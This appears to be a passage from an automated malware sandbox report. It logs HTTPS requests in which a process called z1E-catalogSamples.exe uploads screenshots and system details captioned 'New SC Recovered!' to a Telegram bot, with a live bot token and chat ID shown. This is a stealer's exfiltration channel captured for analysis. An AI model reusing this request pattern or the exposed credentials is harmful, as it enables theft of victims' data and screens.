                                                                  2024-04-19 17:36:37 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:37 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:37 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:37 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:37 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 34 38 63 32 66 61 39 63 30 63 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc8048c2fa9c0c--
                                                                  2024-04-19 17:36:37 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:37 UTC1485INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:37 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3451,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548197,"document":{"file_name":"user-618321 2024-05-30 01-35-17.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg17ZiKrpQoAAUIdCpMK59DhQpR1Q16SAAK_FwACi1IZUUQDO0wHQoYyAQAHbQADNAQ","file_unique_id":"AQADvxcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg17ZiKrpQoAAUIdCpMK59DhQpR1Q16SAAK_FwACi1IZUUQDO0wHQoYyAQAHbQADNAQ","file_unique_id":"AQADvxcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINe2Yiq6UKAAFCHQqTCufQ4UKUdUNekgACvxcAAotSGVFEAztMB0KGMjQE","file_unique_id":"AgADvxcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 05/30/2024 01:30:16\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.549735149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:38 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8f1ec5eab97f
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:38 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 66 31 65 63 35 65 61 62 39 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 66 31 65 63 35 65 61 62 39 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 31 37 2f 32 30 32 34 20 32 32 3a 33 37 3a 32 34 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc8f1ec5eab97fContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8f1ec5eab97fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/17/2024 22:37:24User
                                                                  2024-04-19 17:36:38 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:38 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:38 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:38 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:38 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:38 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 66 31 65 63 35 65 61 62 39 37 66 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc8f1ec5eab97f--
                                                                  2024-04-19 17:36:38 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:39 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:39 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3452,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548199,"document":{"file_name":"user-618321 2024-06-17 22-42-31.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg18ZiKrp4xgJXteIbwjjJ_K76X1dqkAAsAXAAKLUhlR3hoLe0TZtGwBAAdtAAM0BA","file_unique_id":"AQADwBcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg18ZiKrp4xgJXteIbwjjJ_K76X1dqkAAsAXAAKLUhlR3hoLe0TZtGwBAAdtAAM0BA","file_unique_id":"AQADwBcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINfGYiq6eMYCV7XiG8I4yfyu-l9XapAALAFwACi1IZUd4aC3tE2bRsNAQ","file_unique_id":"AgADwBcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/17/2024 22:37:24\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.549736149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:41 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc91ad9f6f5749
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:42 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 61 64 39 66 36 66 35 37 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 61 64 39 66 36 66 35 37 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 31 2f 32 30 32 34 20 30 34 3a 34 30 3a 30 37 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc91ad9f6f5749Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc91ad9f6f5749Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/21/2024 04:40:07User
                                                                  2024-04-19 17:36:42 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:42 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:42 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:42 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:42 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
